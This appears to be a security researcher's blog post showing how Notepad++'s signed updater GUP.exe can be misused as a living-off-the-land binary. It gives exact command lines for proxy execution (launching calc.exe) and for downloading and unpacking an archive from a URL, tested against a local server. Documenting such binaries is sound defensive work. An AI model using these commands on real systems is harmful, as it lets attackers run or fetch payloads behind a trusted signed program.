Notepad ++ comes with a built-in Updater called GUP typically located here:

c:\Program Files (x86)\Notepad++\updater\GUP.exe

It is a generic downloader that accepts a range of command line arguments, and while it’s non-trivial what arguments it take and in what order to make it tick, at least two of them make for a particularly interesting lolbin use cases.

Execute via Proxy

c:\Program Files (x86)\Notepad++\updater\GUP.exe -unzipTo c:\windows\system32\calc.exe <anything> <anything>

f.ex. :

c:\Program Files (x86)\Notepad++\updater\GUP.exe -unzipTo c:\windows\system32\calc.exe 1 1

will launch Calculator.

Downloader

Since it’s a downloader by design, I am not sure to what extent the definition of LOLBIN can cover this use case, but the since program itself is signed, and using it to download something than the original author anticipated kinda ticks the box, I would say it does fulfill these requirements well.

The following command line will download the

GUP.exe -unzipTo [program] [directory] "[name] [URL] [SHA256]"

will download the file from the URL and save it to %TEMP% folder, before it will extract it to [directory].

The %TEMP% bit always works, but if the archive doesn’t follow the expected NPP Plugin structure, or your SHA256 is incorrect you may see errors. The NPP Plugin Structure is trivial, e.g. the following will do:

• bar.zip
  • bar.dll

When downloaded it will be placed under [directory]\bar\bar.dll.

And finally the actual example:

GUP.exe -unzipTo "c:\windows\system32\notepad.exe" "C:\test" "bar http://127.0.0.1:8080/bar.zip C072B391D5FAFC13E9D84A5F3A335A08DA218B5A0130981525EC2E0E3598E76F"

from my test under Tomcat.